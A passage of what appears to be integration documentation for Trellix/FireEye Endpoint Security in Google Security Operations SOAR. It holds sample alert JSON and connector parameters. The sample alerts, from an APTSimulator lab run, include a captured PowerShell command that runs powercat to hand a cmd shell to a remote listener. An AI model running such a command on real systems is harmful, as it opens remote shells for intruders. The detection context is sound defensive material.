            "hostname": "FireEye-Domain",
            "containment_state": "normal"
        "event_at": "2021-07-01T09:44:18.809+00:00",
        "matched_at": "2021-07-01T09:44:18.809+00:00",
        "reported_at": "2021-07-01T09:44:20.353+00:00",
        "source": "MAL",
        "resolution": "QUARANTINED",
        "decorators": [],
        "md5values": [
        "decorator_sources": [],
        "decorator_statuses": [],
        "url": "/hx/api/v3/alerts/812",
        "condition": null,
        "event_id": null,
        "event_type": null,
        "event_values": {
            "system-data": {
                "xmlns": "",
                "xmlns:xsi": "",
                "xsi:schemaLocation": " AM-alert.xsd",
                "alert-version": "3",
                "correlation-id": "d01e8ea6-4d34-4005-8482-3ccc026e11ea",
                "timestamp": "2021-07-01T09:44:18.809Z",
                "product-version": "32.36.0",
                "engine-version": "",
                "content-version": "7.86346",
                "mg-engine-version": "",
                "mg-content-version": "25",
                "whitelist-schema-version": "1.0.0",
                "whitelist-content-version": "1.32.1"
            "os-details": {
                "$": {
                    "name": "windows",
                    "version": "10.0.14393",
                    "patch": "0",
                    "os-arch": "64-bit",
                    "os-language": "en-US"
            "scan-type": "oas",
            "scanned-object": {
                "scanned-object-type": "file-event",
                "file-event": {
                    "file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
                    "actor-process": {
                        "pid": "1268",
                        "path": "C:\\Windows\\System32\\xcopy.exe",
                        "user": {
                            "username": "",
                            "domain": ""
                    "sub-type": "FILE_OPERATION_CLOSED"
            "detections": {
                "detection": [
                        "engine": {
                            "engine-type": "av",
                            "engine-version": "",
                            "content-version": "7.86346"
                        "infected-object": {
                            "object-type": "file",
                            "file-object": {
                                "file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
                                "inner-file-path": "",
                                "original-file-name": "",
                                "container": "false",
                                "packed": "false",
                                "hidden": "false",
                                "system-file": "false",
                                "read-only": "false",
                                "temporary": "false",
                                "md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
                                "sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
                                "sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
                                "size-in-bytes": "753",
                                "creation-time": "2021-07-01T09:41:47.610Z",
                                "modification-time": "2020-05-29T09:34:17.066Z",
                                "access-time": "2021-07-01T09:41:47.610Z"
                        "infection": {
                            "confidence-level": "high",
                            "infection-type": "malware",
                            "infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F"
                        "action": {
                            "actioned-object": {
                                "object-type": "file",
                                "file-object": {
                                    "file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
                                    "inner-file-path": "",
                                    "original-file-name": "",
                                    "container": "false",
                                    "packed": "false",
                                    "hidden": "false",
                                    "system-file": "false",
                                    "read-only": "false",
                                    "temporary": "false",
                                    "md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
                                    "sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
                                    "sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
                                    "size-in-bytes": "753",
                                    "creation-time": "2021-07-01T09:41:47.610Z",
                                    "modification-time": "2020-05-29T09:34:17.066Z",
                                    "access-time": "2021-07-01T09:41:47.610Z"
                            "requested-action": "clean",
                            "applied-action": "quarantine",
                            "result": "success",
                            "error": "0",
                            "reboot-required": "false"
            "scan-statistics": {
                "total-scan-time-in-ms": "12227"
        "is_false_positive": false
    "generic_alert_badge": null,
    "generic_alert_label": null,
    "stats": {
        "events": 1
    "url": "/hx/api/v3/alert_groups/6d9a68f2a78f8d983bd3c0f4556785e6",
    "created_at": "2021-07-01T09:44:23.726Z",
    "acknowledgement": {
        "acknowledged": false,
        "acknowledged_by": null,
        "acknowledged_time": null,
        "comment": null,
        "comment_update_time": null
    "grouped_by": {
        "md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
        "file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
        "infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F",
        "detected_by": "malware_file_access_scan",
        "host": {
            "_id": "JS2asEbMWGgfxT0aHVu034",
            "url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
            "hostname": "FireEye-Domain",
            "primary_ip_address": ""
    "_id": "0043aa34dea99c23996c2f16291cdb4e",
    "assessment": "[Process powershell.exe started] POWERCAT (UTILITY)",
    "file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "first_event_at": "2021-07-01T09:41:50.428Z",
    "last_event_at": "2021-07-01T09:41:50.428Z",
    "dispositions": [],
    "source": "IOC",
    "has_fp_disposition": false,
    "last_alert": {
        "_id": 811,
        "agent": {
            "_id": "JS2asEbMWGgfxT0aHVu034",
            "url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
            "hostname": "FireEye-Domain",
            "containment_state": "normal"
        "condition": {
            "_id": "KBvTAC_L_GiI9BZbph2GoA==",
            "url": "/hx/api/v3/conditions/KBvTAC_L_GiI9BZbph2GoA=="
        "event_at": "2021-07-01T09:41:50.428+00:00",
        "matched_at": "2021-07-01T09:43:29+00:00",
        "reported_at": "2021-07-01T09:44:09.339+00:00",
        "source": "IOC",
        "resolution": "ALERT",
        "decorators": [],
        "md5values": [
        "decorator_sources": [],
        "decorator_statuses": [],
        "url": "/hx/api/v3/alerts/811",
        "event_id": 11311494,
        "event_type": "processEvent",
        "event_values": {
            "processEvent/timestamp": "2021-07-01T09:41:50.428Z",
            "processEvent/eventType": "start",
            "processEvent/pid": 3676,
            "processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
            "processEvent/process": "powershell.exe",
            "processEvent/parentPid": 2496,
            "processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
            "processEvent/parentProcess": "cmd.exe",
            "processEvent/username": "FIREEYE-LAB\\Administrator",
            "processEvent/startTime": "2021-07-01T09:41:50.428Z",
            "processEvent/md5": "097ce5761c89434367598b34fe32893b",
            "processEvent/processCmdLine": "powershell  -Exec Bypass \". \\\"C:\\TMP\\nc.ps1\\\";powercat -c -p 80 -t 2 -e cmd\""
        "multiple_match": "Multiple Indicators Matched.",
        "is_false_positive": false
    "generic_alert_badge": null,
    "generic_alert_label": null,
    "stats": {
        "events": 1
    "url": "/hx/api/v3/alert_groups/0043aa34dea99c23996c2f16291cdb4e",
    "created_at": "2021-07-01T09:44:13.744Z",
    "acknowledgement": {
        "acknowledged": false,
        "acknowledged_by": null,
        "acknowledged_time": null,
        "comment": null,
        "comment_update_time": null
    "grouped_by": {
        "condition_id": "KBvTAC_L_GiI9BZbph2GoA==",
        "detected_by": "ioc_engine",
        "host": {
            "_id": "JS2asEbMWGgfxT0aHVu034",
            "url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
            "hostname": "FireEye-Domain",
            "primary_ip_address": ""
Case Wall
Result type Value/Description Type
Output message\*

The action should not fail nor stop a playbook execution:
if data is available for one(is_success = true): "Successfully retrieved alert groups for the following entities in Trellix Endpoint Security: {entity.identifier}".

if data is not available for one(is_success = true): "Action wasn't able to retrieve alert groups for the following entities in Trellix Endpoint Security: {entity.identifier}".

If data is not available for all(is_success=false): "No alert groups were found for the provided entities in Trellix Endpoint Security".

The action should fail and stop a playbook execution:
if fatal error, like wrong credentials, no connection to server, other: "Error executing action "Get Host Alert Groups". Reason: {0}''.format(error.Stacktrace)

Case Wall Table


  • Assessment
  • Alert Group ID
  • First Event At
  • Last Event At
  • Acknowledged
  • Events Count
  • Detected By


FireEye HX Alerts Connector


Google Security Operations SOAR SOAR Trellix Endpoint Security Alerts Connector ingests alerts generated on Trellix Endpoint Security server.

The Connector periodically connects to the Trellix Endpoint Security API server endpoint and pulls a list of alerts generated for a specific time period. If there are new alerts present, the Connector creates Google Security Operations SOAR SOAR alerts based on the Trellix Endpoint Security alerts and saves the Connector timestamp as the last successfully ingested alert time. In the next Connector execution, the Connector will query the Trellix Endpoint Security API only for alerts, created from timestamp (timestamp plus some "technical" offset to not make connector "stuck"). If there are no new alerts found - finish current execution.

API Permissions

Trellix Endpoint Security Alerts Connector uses the same API authentication methods and permissions as existing FireEye integration - to work with FireEye alerts, account that will be used for the integration should have an "API Analyst" or "API Admin" role.

Configure FireEye HX Alerts Connector in Google Security Operations SOAR

For detailed instructions on how to configure a connector in Google Security Operations SOAR, see Configuring the connector.

Connector parameters

Use the following parameters to configure the connector:

Parameter Display Name Type Default Value Is mandatory Description
Product Field Name String ProductName Yes Platform defined description, field is immutable.
Event Field Name String AlertName Yes Platform defined description, field is immutable.
Environment Field Name String "" No

Describes the name of the field where the environment name is stored.

If the environment field isn't found, the environment is "".

Environment Regex Pattern String .* No

A regex pattern to run on the value found in the "Environment Field Name" field.

Default is .* to catch all and return the value unchanged.

Used to allow the user to manipulate the environment field via regex logic

If the regex pattern is null or empty, or the environment value is null, the final environment result is "".

Script Timeout (Seconds) Integer 180 Yes Timeout limit for the python process running the current script.
API Root String https://x.x.x.x:<port> Yes Trellix Endpoint Security Server API Root URL
Username String N/A Yes Trellix Endpoint Security user to authenticate with
Password Password N/A Yes Trellix Endpoint Security user password to authenticate with
Verify SSL Checkbox Checked Yes If specified, connector will check if Trellix Endpoint Security is configured with valid SSL certificate. If certificate is not valid, connector will return error.
Offset time in hours Integer 24 Yes Fetch alerts from X hours backwards.
Max Alerts Per Cycle Integer 25 Yes How many alerts should be processed during one connector run.
Alert Type String active_threat No Specify what Trellix Endpoint Security alert types to ingest. By default its set to active_threat to return alerts in ALERT and QUARANTINED/partial_block state. Other valid parameter is ALERT, which will return open alerts only.
Use whitelist as a blacklist Checkbox (checkbox) Unchecked Yes If enabled, whitelist will be used as a blacklist.
Proxy Server Address IP_OR_HOST N/A No Proxy server to use for connection.
Proxy Server Username String N/A No Proxy server username.
Proxy Server Password Password N/A No Proxy server password.

Connector Rules

  • Blacklist Blacklist rules should be supported, but connector uses whitelist logic by default.
  • Whitelist rules Used by default.
  • Proxy Support The Connector supports Proxy.
  • Default ConnectorRules
RuleType(Whitelist \ Blacklist) RuleName (string)
WhiteList Specify in this section which alerts to ingest based on alert source and subtype attributes, for example: "IOC" for indicator alerts, "MAL AV" to ingest malware alerts only with "AV" subtype, or "MAL" to ingest all malware alerts, regardless of subtype. To ingest all alerts, remove everything from the whitelist section.